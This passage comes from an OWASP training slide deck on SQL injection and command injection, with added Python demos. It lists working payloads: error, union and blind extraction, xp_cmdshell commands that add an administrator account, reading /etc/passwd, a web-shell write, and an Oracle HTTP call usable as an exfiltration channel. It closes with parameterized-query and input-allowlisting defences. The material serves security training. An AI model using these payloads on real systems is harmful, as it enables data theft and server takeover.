![Page 66: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/66.jpg)
https://172.17.0.145/Web1/ exercise
EXERCISE – SQL Injection Auth. Bypass
![Page 67: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/67.jpg)
Requires that database errors reach the user: either error display is turned on in the application or database configuration, or exceptions in the code are not handled properly and are printed back to the user
The goal is to make the database throw an error and have the application print the error message back with valuable data embedded in it
ERROR Based SQL Injection
![Page 68: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/68.jpg)
```text
http://victim.com/showmovies.aspx?name=rad' and 1=0/@@version --
```
```text
Server Error in '/' Application.
Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright © 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: )' to a column of datatype int.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
```
The division forces MSSQL to convert the string @@version to an integer; the conversion error echoes the string back.
ERROR Based SQL Injection
![Page 69: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/69.jpg)
(MSSQL) Get a column name:
http://victim.com/showmovies.aspx?name=rad' having '1'='1
→ the error names WEBUSERS.UserID (HAVING without GROUP BY makes the server complain about the first non-aggregated column in the select list)
Get the next column name:
http://victim.com/showmovies.aspx?name=rad' group by UserID having '1'='1
→ the error names WEBUSERS.Username (add each discovered column to the GROUP BY to get the next one)
ERROR Based SQL Injection
![Page 70: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/70.jpg)
Error-based SQLi, MySQL:
http://victim.com/showmovies.php?name=rad' and ExtractValue(1,CONCAT(0x5c, (SELECT @@version))) --%20
XPATH syntax error: '\5.1.41-3ubuntu12.6-log'
ERROR Based SQL Injection
![Page 71: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/71.jpg)
For Oracle error-based SQL injection use the utl_inaddr.get_host_name() function:
http://victim.com/showmovies.jsp?name=rad' and (utl_inaddr.get_host_name((select sys.database_name from dual)))=1 --
```text
ORA-29257: host MOVIE_DATABASE unknown
ORA-06512: at 'SYS.UTL_INADDR' line 4
ORA-06512: at 'SYS.UTL_INADDR' line 35
ORA-06512: at line 1
```
ERROR Based SQL Injection
![Page 72: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/72.jpg)
Sometimes the utl_inaddr.get_host_name() function produces the following error:
◦ ORA-24247: network access denied by access control list (ACL)
The following technique works regardless of network restrictions/permissions:
(select 1 from dual where 1=1 and 1=length(extractvalue(xmltype('<x/>'),'/$'||(select user from dual))))
ERROR Based SQL Injection
![Page 73: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/73.jpg)
Postgres:
http://victim.com/showmovies.do?name=rad' and 1=cast(version() as int)--
ERROR: invalid input syntax for integer "PostgreSQL 8.3.7 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20071124 (Red Hat 4.1.2-42)"
ERROR Based SQL Injection
![Page 74: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/74.jpg)
https://172.17.0.42/dvwa/ → SQL Injection
Demo/Exercise – Error-based SQL Injection
![Page 75: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/75.jpg)
Find the number of columns (increase the number until it errors)
◦ ' order by 2 --
Find which columns are rendered in the page
◦ ' union select 1,2 --
Extract data through a rendered column
◦ ' union select 1,@@version --
Union Based SQL Injection
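The three union steps above, automated against an in-memory SQLite search page, as an added example that is not the slides' or DVWA's code: the column count comes from `ORDER BY`, the rendered columns from numeric markers, and data from an expression placed in a rendered column. The movies and users tables are constructed; SQLite has `sqlite_version()` and `sqlite_master` where MSSQL has `@@version` and `information_schema`.

```python
import sqlite3


def make_db():
    """Constructed database: a movies table behind the search page, plus a users table to dump."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE movies (id INTEGER, name TEXT, year INTEGER)")
    conn.executemany("INSERT INTO movies VALUES (?, ?, ?)",
                     [(1, "rad", 1986), (2, "hackers", 1995)])
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return conn


def search_movies(conn, name):
    """The vulnerable page: (name, year) rows for the query string, concatenated straight in."""
    sql = "SELECT name, year FROM movies WHERE name = '%s'" % name
    return conn.execute(sql).fetchall()


def find_column_count(page, max_cols=10):
    """Step 1: ' order by N -- errors as soon as N exceeds the number of selected columns."""
    for n in range(1, max_cols + 1):
        try:
            page("x' ORDER BY %d --" % n)
        except sqlite3.OperationalError:      # "ORDER BY term out of range"
            return n - 1
    return None


def find_visible_columns(page, ncols):
    """Step 2: ' union select 1,2,... -- ; the markers that show up are the rendered columns."""
    markers = ", ".join(str(i) for i in range(1, ncols + 1))
    shown = set()
    for row in page("x' UNION SELECT %s --" % markers):
        shown.update(i for i, v in enumerate(row, 1) if str(v) == str(i))
    return sorted(shown)


def extract(page, ncols, column, expression, from_clause=""):
    """Step 3: put an expression (optionally with its own FROM) into a rendered column."""
    cells = [str(i) for i in range(1, ncols + 1)]
    cells[column - 1] = expression
    rows = page("x' UNION SELECT %s %s --" % (", ".join(cells), from_clause))
    return [row[column - 1] for row in rows]


def run_demo():
    """Whole procedure end to end; returns what each step found."""
    conn = make_db()
    page = lambda q: search_movies(conn, q)
    ncols = find_column_count(page)
    return {
        "columns": ncols,
        "visible": find_visible_columns(page, ncols),
        "version": extract(page, ncols, 2, "sqlite_version()"),
        "tables": sorted(extract(page, ncols, 2, "name", "FROM sqlite_master WHERE type='table'")),
        "creds": extract(page, ncols, 2, "username || ':' || password", "FROM users"),
    }


if __name__ == "__main__":
    print(run_demo())
```

The `x'` prefix makes the original WHERE match nothing, so only the UNION rows come back; on a real target the marker values (1, 2, ...) are what you look for in the rendered HTML.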
![Page 76: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/76.jpg)
https://172.17.0.42/dvwa/ → SQL Injection
Demo/Exercise – Union-based SQL Injection
![Page 77: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/77.jpg)
When entering a SQLi trigger you get a generic error or redirect (HTTP 200, 302, 500) and no data or error text comes back
To confirm the SQL injection try using a time-based delay:
◦ waitfor delay '0:0:20' -- (MS SQL)
◦ benchmark(100000000, rand()) -- (MySQL)
◦ select sleep(20) -- (MySQL 5.0.12 and later)
◦ pg_sleep(20) -- (Postgres)
◦ 'a'||Utl_Http.request('http://madeupserver.com') -- (Oracle; the delay is the outbound connection timing out)
◦ dbms_lock.sleep(20) -- (Oracle; DBA only, requires PL/SQL injection and doesn't work in a WHERE clause)
Blind SQL Injection
![Page 78: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/78.jpg)
Examples of confirming SQL injection:
```text
http://victim.com/showmovies.aspx?name=rad' waitfor delay '0:0:20' --
http://victim.com/showmovies.php?name=rad' or 1=(select sleep(20)) --%20
http://victim.com/showmovies.do?name=rad' and 1=(select 1 from pg_sleep(20)) --
http://victim.com/showmovies.jsp?name=rad'||Utl_Http.request('http://madeupserver.com') --
```
Blind SQL Injection
![Page 79: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/79.jpg)
Other methods for confirming blind SQL injection
Try using addition or subtraction (the same page coming back means the database evaluated the arithmetic)
◦ http://victim.com/showmovies.aspx?id=2
◦ http://victim.com/showmovies.aspx?id=3-1
◦ http://victim.com/showmovies.aspx?id=1%2b1
Try using a comment
◦ http://victim.com/showmovies.aspx?name=rad' --
◦ http://victim.com/showmovies.aspx?id=1 /**/
Try a percent sign (the LIKE wildcard) or a statement that evaluates to true and/or false
◦ http://victim.com/showmovies.aspx?name=%
◦ http://victim.com/showmovies.aspx?name=rad' or 1=1 --
◦ http://victim.com/showmovies.aspx?name=rad' and 1=2 --
Try string concatenation
◦ (MSSQL) http://victim.com/showmovies.aspx?name=ra'%2b'd
◦ (Oracle) http://victim.com/showmovies.jsp?name=ra'||'d
◦ (MySQL) http://victim.com/showmovies.php?name=ra' 'd
Blind SQL Injection
![Page 80: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/80.jpg)
Extracting data (TRUE or FALSE): the page delays only when the condition holds
http://victim.com/showmovies.aspx?name=rad' ;if is_srvrolemember('sysadmin')=1 waitfor delay '0:0:20'--
http://victim.com/showmovies.aspx?name=rad';if @@version like '%252005%25' waitfor delay '0:0:20' --
(%25 is a URL-encoded %, the LIKE wildcard, so the pattern the database sees is %2005%)
Blind SQL Injection
![Page 81: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/81.jpg)
LIKE technique (each request asks whether SYSTEM_USER contains one character; a delay means yes)
```text
http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25a%25' waitfor delay '0:0:12'--   TRUE (contains 'a')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25e%25' waitfor delay '0:0:12'--   TRUE (contains 'e')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25o%25' waitfor delay '0:0:12'--   TRUE (contains 'o')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25p%25' waitfor delay '0:0:12'--   TRUE (contains 'p')
```
Blind SQL Injection
![Page 82: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/82.jpg)
LIKE technique continued
```text
http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25r%25' waitfor delay '0:0:12'--   TRUE (contains 'r')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25s%25' waitfor delay '0:0:12'--   TRUE (contains 's')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25u%25' waitfor delay '0:0:12'--   TRUE (contains 'u')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25w%25' waitfor delay '0:0:12'--   TRUE (contains 'w')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25_%25' waitfor delay '0:0:12'--   TRUE (contains '_')
```
Character set found so far: a e o p r s u w _
Caveat: inside a LIKE pattern `_` is itself a wildcard (any single character), so `%_%` is true for every non-empty value; to test for a literal underscore on MSSQL write `'%[_]%'`.
Blind SQL Injection
![Page 83: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/83.jpg)
LIKE technique continued: now anchor the prefix
```text
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'o%25' waitfor delay '0:0:12'--      TRUE (starts with 'o')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'ow%25' waitfor delay '0:0:12'--     TRUE (starts with 'ow')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owa%25' waitfor delay '0:0:12'--    TRUE (starts with 'owa')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owas%25' waitfor delay '0:0:12'--   TRUE (starts with 'owas')
```
Blind SQL Injection
![Page 84: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/84.jpg)
LIKE technique continued
```text
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp%25' waitfor delay '0:0:12'--      TRUE (starts with 'owasp')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_%25' waitfor delay '0:0:12'--     TRUE (starts with 'owasp_')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_u%25' waitfor delay '0:0:12'--    TRUE (starts with 'owasp_u')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_us%25' waitfor delay '0:0:12'--   TRUE (starts with 'owasp_us')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_use%25' waitfor delay '0:0:12'--  TRUE (starts with 'owasp_use')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_user' waitfor delay '0:0:12'--    TRUE (user is 'owasp_user')
```
The final request has no trailing `%`, so it confirms the length and every character except the one under the `_` wildcard; use `[_]` in that position to pin it down.
Blind SQL Injection
![Page 85: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/85.jpg)
Binary search technique (is the first character's ASCII code below the midpoint of the remaining range?)
```text
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <127 waitfor delay'0:0:20'--   TRUE
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <63 waitfor delay'0:0:20'--    FALSE
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <95 waitfor delay'0:0:20'--    FALSE
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <110 waitfor delay'0:0:20'--   FALSE
```
Blind SQL Injection
![Page 86: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/86.jpg)
Binary search technique continued
```text
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <119 waitfor delay'0:0:20'--   TRUE
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <114 waitfor delay'0:0:20'--   TRUE
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <112 waitfor delay'0:0:20'--   FALSE
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) =111 waitfor delay'0:0:20'--   TRUE
```
111 decimal is 'o': the first character is o.
Blind SQL Injection
![Page 87: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/87.jpg)
Logical AND (&) technique (break out the ASCII chart)
How the bitwise AND operator works:
◦ 1 & 1 = 1
◦ 1 & 0 = 0
◦ 0 & 1 = 0
◦ 0 & 0 = 0
◦ 1100 & 0110 = 0100
This technique extracts one bit at a time (8 requests per byte)
Blind SQL Injection
![Page 88: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/88.jpg)
ASCII character 'o' is hex 6F, binary 0110 1111
Since ASCII characters fit in 7 bits (values 0-127, one byte with the top bit clear), we AND each character with 128 (1000 0000), 64 (0100 0000), 32 (0010 0000), 16 (0001 0000), 8 (0000 1000), 4 (0000 0100), 2 (0000 0010), 1 (0000 0001); the 128 test is always false for plain ASCII and can be skipped
If we AND with each bit value and delay when the result is non-zero, then for 'o' we should observe:
NO-DELAY, DELAY, DELAY, NO-DELAY, DELAY, DELAY, DELAY, DELAY
Blind SQL Injection
![Page 89: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/89.jpg)
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 128=128 waitfor delay '0:0:20'-- → FALSE (no delay)
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 64=64 waitfor delay '0:0:20'-- → TRUE (delay)
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 32=32 waitfor delay '0:0:20'-- → TRUE (delay)
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 16=16 waitfor delay '0:0:20'-- → FALSE (no delay)
Blind SQL Injection
![Page 90: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/90.jpg)
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 8=8 waitfor delay '0:0:20'-- → TRUE (delay)
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 4=4 waitfor delay '0:0:20'-- → TRUE (delay)
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 2=2 waitfor delay '0:0:20'-- → TRUE (delay)
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 1=1 waitfor delay '0:0:20'-- → TRUE (delay)
Blind SQL Injection
![Page 91: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/91.jpg)
The Logical AND technique takes roughly the same number of requests per character as the binary search technique (7 or 8 in both cases). The difference is that each AND probe tests one fixed bit and does not depend on the answer to the previous probe, whereas every binary-search step depends on the previous result. Independent probes can be sent concurrently, which cuts the wall-clock time of the extraction. The caveat for any time-based inference is that concurrent delayed queries load the server and can blur the timing signal, so keep the delay well above the site's normal response-time jitter and re-test any character whose result is ambiguous.
Blind SQL Injection
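The two extraction strategies from the preceding slides, driven against a simulated target so that payloads and request counts can be compared offline. This is an added example and not code from the OWASP San Diego slides; SECRET stands in for SYSTEM_USER on the MSSQL target, and the SimulatedTarget class answers the timing question that a real server would answer with a 20-second delay (a real driver would send each payload over HTTP and treat a response slower than the injected delay as TRUE).

```python
"""Blind SQL injection extraction: binary search versus bitwise AND."""
import threading
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, List, Optional

SECRET = "owasp"  # constructed stand-in for SYSTEM_USER on the simulated target


def payload(pos: int, op: str, value: int, delay: str = "0:0:20") -> str:
    """Build the T-SQL from the slides; the 'if' only waits when the test is true."""
    char = f"ASCII(SUBSTRING(SYSTEM_USER,{pos},1))"
    test = f"{char} & {value} = {value}" if op == "&" else f"{char} {op} {value}"
    return f"1';if {test} waitfor delay '{delay}'--"


class SimulatedTarget:
    """Stands in for the vulnerable search.aspx: reports whether a probe would delay."""

    def __init__(self, secret: str) -> None:
        self.secret = secret
        self.requests = 0
        self.sent: List[str] = []           # payloads, in the order they were 'sent'
        self._lock = threading.Lock()

    def delayed(self, pos: int, op: str, value: int) -> bool:
        with self._lock:
            self.requests += 1
            self.sent.append(payload(pos, op, value))
        if pos > len(self.secret):
            return False                    # ASCII('') is NULL on MSSQL: every comparison is false
        code = ord(self.secret[pos - 1])
        if op == "<":
            return code < value
        if op == "=":
            return code == value
        if op == "&":
            return (code & value) == value
        raise ValueError(op)


def extract_binary_search(target: SimulatedTarget, pos: int) -> Optional[str]:
    """Halve the ASCII range [lo, hi) with '<' probes, then confirm with '=' (7 + 1 requests).
    Each probe depends on the previous answer, so these must run one after another."""
    lo, hi = 0, 128
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if target.delayed(pos, "<", mid):
            hi = mid
        else:
            lo = mid
    return chr(lo) if target.delayed(pos, "=", lo) else None   # None: past the end of the string


def extract_bitwise(target: SimulatedTarget, pos: int) -> Optional[str]:
    """Test one bit per probe. Bit 128 is never set in ASCII, so 7 probes suffice.
    The probes are independent of each other, so they are issued concurrently."""
    masks = (64, 32, 16, 8, 4, 2, 1)
    with ThreadPoolExecutor(max_workers=len(masks)) as pool:
        bits = list(pool.map(lambda m: target.delayed(pos, "&", m), masks))
    code = sum(m for m, is_set in zip(masks, bits) if is_set)
    return chr(code) if code else None      # 0 means no bit test delayed: end of string


def extract_string(target: SimulatedTarget,
                   method: Callable[[SimulatedTarget, int], Optional[str]]) -> str:
    """Walk positions 1, 2, ... until the method reports the end of the string."""
    out, pos = [], 1
    while (ch := method(target, pos)) is not None:
        out.append(ch)
        pos += 1
    return "".join(out)


if __name__ == "__main__":
    for method in (extract_binary_search, extract_bitwise):
        target = SimulatedTarget(SECRET)
        print(method.__name__, extract_string(target, method), target.requests, "requests")
        print("  first payload:", target.sent[0])
```

For the five-character secret the binary search costs 48 simulated requests and the bitwise method 42, one extra round in each case to detect the end of the string; the bitwise rounds finish in the time of a single delay because their seven probes are in flight at once.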
![Page 92: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/92.jpg)
Inference response based blind SQL Injection
TRUE or FALSE is inferred from the site's response (status code, page content or length) instead of from timing
http://victim.com/search.aspx?id=1' and 1=1 -- (normal page, no 500)
http://victim.com/search.aspx?id=1' and 1=1/0 -- (division by zero raises a database error, 500)
Wrapping the division in a conditional, e.g. and 1=(case when <condition> then 1 else 1/0 end) --, turns the error into a yes/no oracle for any condition, so the same binary-search and bit probes work without any delay.
Blind SQL Injection
![Page 93: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/93.jpg)
Oracle timing based SQL Injection
(select 'a'||Utl_Http.request('http://madeupserver.com') from dual WHERE (SELECT username FROM all_users WHERE username='DBSNMP') = 'DBSNMP') --
Oracle has no WAITFOR, so an HTTP request to an unreachable host is used as the delay: the call is only evaluated when the WHERE condition holds (here, whether the DBSNMP account exists), and the request timing out is what makes the response slow. The database account needs execute privilege on UTL_HTTP, and from Oracle 11g outbound connections are also gated by network ACLs; if the host is one you control, the same call doubles as an out-of-band (DNS/HTTP) channel.
Blind SQL Injection
![Page 94: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/94.jpg)
Heavy Queries
http://victim.com/search.aspx?id=1' and (light query) and (heavy query)
When the database offers no sleep or delay function, an expensive query (for example a cross join of large system tables) serves as the delay. The light query is the condition under test: if it is false the AND short-circuits and the heavy query never runs; if it is true the heavy query runs and the response is slow. Whether the optimizer really evaluates the terms in that order depends on the database, so calibrate a known-true and a known-false condition before extracting data.
Blind SQL Injection
![Page 95: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/95.jpg)
Demo
![Page 96: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/96.jpg)
Execute commands in MSSQL by using xp_cmdshell
' exec sp_configure 'show advanced options',1 --
' ; RECONFIGURE --
' exec sp_configure 'xp_cmdshell',1 --
' ; RECONFIGURE --
' exec master..xp_cmdshell 'net user pwny pwnsauce /ADD' --
' exec master..xp_cmdshell 'net localgroup Administrators pwny /ADD' --
xp_cmdshell is disabled by default since SQL Server 2005, which is why the first four statements enable it; that requires sysadmin rights on the injected login, and the commands then run as the SQL Server service account, so what you get is whatever that account may do on the host.
Metasploit and Core Impact both have modules for this that could help speed up exploitation and pivoting on a system
SQL Injection Operating System
![Page 97: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/97.jpg)
MySQL read file from filesystem
◦ select LOAD_FILE('/etc/passwd')
MySQL write file to filesystem
◦ select 'this is a test' into outfile '/var/www/test.txt'
Both need the FILE privilege on the MySQL account and run as the mysqld OS user, so the file must be readable (or the directory writable) by that user; since MySQL 5.7 the secure_file_priv setting commonly limits both to one directory or disables them, and INTO OUTFILE refuses to overwrite an existing file.
SQL Injection Operating System
![Page 98: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/98.jpg)
Parameterized Queries or Prepared Statements
Don't put user input into an ORDER BY clause. ORDER BY is not usually supported with parameterized queries (the column name is an identifier, not a value), so:
◦ ASC and DESC are the only two options: choose between them with an if statement, or sort the output in JavaScript on the client
◦ For the column, fetch the valid table or column names with a query (or keep an allowlist), check whether the user input matches one of them, then concatenate the value returned by that query, never the raw user input
SQL Injection Defense
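The defence slide above in working form: a concatenated query beside its parameterized version, and an ORDER BY whose column is taken from the schema rather than from the request. This is an added example, not code from the slides; it uses Python's built-in sqlite3 module with a constructed products table so it runs offline, and the placeholder syntax (? here) varies by database driver.

```python
"""Parameterized queries and a schema-checked ORDER BY, demonstrated with sqlite3."""
import sqlite3
from typing import List


def setup() -> sqlite3.Connection:
    """Constructed sample data for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products (name, price) VALUES (?, ?)",
                     [("apple", 1.0), ("pear", 2.5), ("melon", 4.0)])
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> List[str]:
    """String concatenation: the input becomes part of the SQL grammar."""
    sql = f"SELECT name FROM products WHERE name = '{term}'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn: sqlite3.Connection, term: str) -> List[str]:
    """Bound parameter: the input is data and can never change the query's structure."""
    return [row[0] for row in conn.execute("SELECT name FROM products WHERE name = ?", (term,))]


def sort_column(conn: sqlite3.Connection, requested: str) -> str:
    """ORDER BY cannot take a bound parameter, so compare the request with the real
    column names and return the schema's own string, never the user's."""
    for row in conn.execute("PRAGMA table_info(products)"):   # (cid, name, type, ...)
        if row[1] == requested:
            return row[1]
    raise ValueError(f"unknown sort column: {requested!r}")


def list_sorted(conn: sqlite3.Connection, sort_by: str, direction: str) -> List[str]:
    """ASC/DESC are the only two options, so pick one with an if, not by concatenation."""
    column = sort_column(conn, sort_by)
    order = "DESC" if direction.lower() == "desc" else "ASC"
    return [row[0] for row in conn.execute(f"SELECT name FROM products ORDER BY {column} {order}")]


if __name__ == "__main__":
    conn = setup()
    evil = "x' OR '1'='1"
    print("vulnerable:", search_vulnerable(conn, evil))   # every row leaks
    print("safe:      ", search_safe(conn, evil))         # nothing equals that literal string
    print("sorted:    ", list_sorted(conn, "price", "desc"))
    try:
        list_sorted(conn, "price; DROP TABLE products", "asc")
    except ValueError as err:
        print("rejected:  ", err)
```

The column check deliberately returns the name found in the PRAGMA output rather than the request string, so even a request that compares equal contributes nothing to the final SQL text.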
![Page 99: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/99.jpg)
https://victim.com/dnslookup.php?dnsentry=google.com
https://victim.com/dnslookup.php?dnsentry=google.com;cat%20%2fetc%2fpasswd (URL-encoded)
https://victim.com/dnslookup.php?dnsentry=google.com;cat /etc/passwd (the same request decoded)
https://victim.com/dnslookup.php?dnsentry=blah;&&ls -l
Command Injection
![Page 100: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/100.jpg)
Commands
◦ google.com; ping -c 20 localhost
◦ google.com & ping -c 20 localhost
◦ google.com && ping -c 20 localhost
◦ google.com && ping -n 20 localhost (Windows ping takes the count with -n)
◦ google.com && ping -c 20 localhost #
◦ google.com && echo '<?php …system(…)..' > /var/www/site/cmd.php
The 20-packet ping is the command-injection equivalent of waitfor delay: a slow response confirms execution even when the output is not echoed back. The trailing # comments out anything the application appends after the input, and the echo writes a web shell that is then requested through the browser.
Command Injection
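The dnslookup.php pattern from the preceding slides, as a vulnerable handler beside a hardened one. This is an added example, not code from the slides or from DVWA: the lookup tool is replaced by echo so that the script runs offline and the injected command is visible in its output, and the hostname pattern is the usual RFC 1123 shape, chosen here as the allowlist.

```python
"""Shell command injection: the vulnerable form beside the hardened form."""
import re
import subprocess

# One or more RFC 1123 labels separated by dots: letters, digits and inner hyphens only.
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$", re.IGNORECASE)


def lookup_vulnerable(host: str) -> str:
    """shell=True hands the string to /bin/sh, so ; && | and newlines start new commands."""
    result = subprocess.run(f"echo resolving {host}", shell=True,
                            capture_output=True, text=True)
    return result.stdout


def lookup_argv(host: str) -> str:
    """argv list, no shell: metacharacters stay literal text. A value starting with '-'
    could still be read as an option by the real tool, so this alone is not enough."""
    result = subprocess.run(["echo", "resolving", host], capture_output=True, text=True)
    return result.stdout


def is_valid_hostname(host: str) -> bool:
    return HOSTNAME.match(host) is not None


def lookup_safe(host: str) -> str:
    """Allowlist the input first, then call the tool without a shell."""
    if not is_valid_hostname(host):
        raise ValueError(f"rejected hostname: {host!r}")
    return lookup_argv(host)


if __name__ == "__main__":
    attack = "google.com; echo INJECTED"
    print(lookup_vulnerable(attack), end="")   # two lines: the lookup, then INJECTED
    print(lookup_argv(attack), end="")         # one line: the ';' is just part of the text
    try:
        lookup_safe(attack)
    except ValueError as err:
        print(err)
```

Run under sh the vulnerable form prints a second line, INJECTED, proving that the semicolon ended the intended command; the argv form prints the whole input as one argument, and the hardened form refuses it before any process starts.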
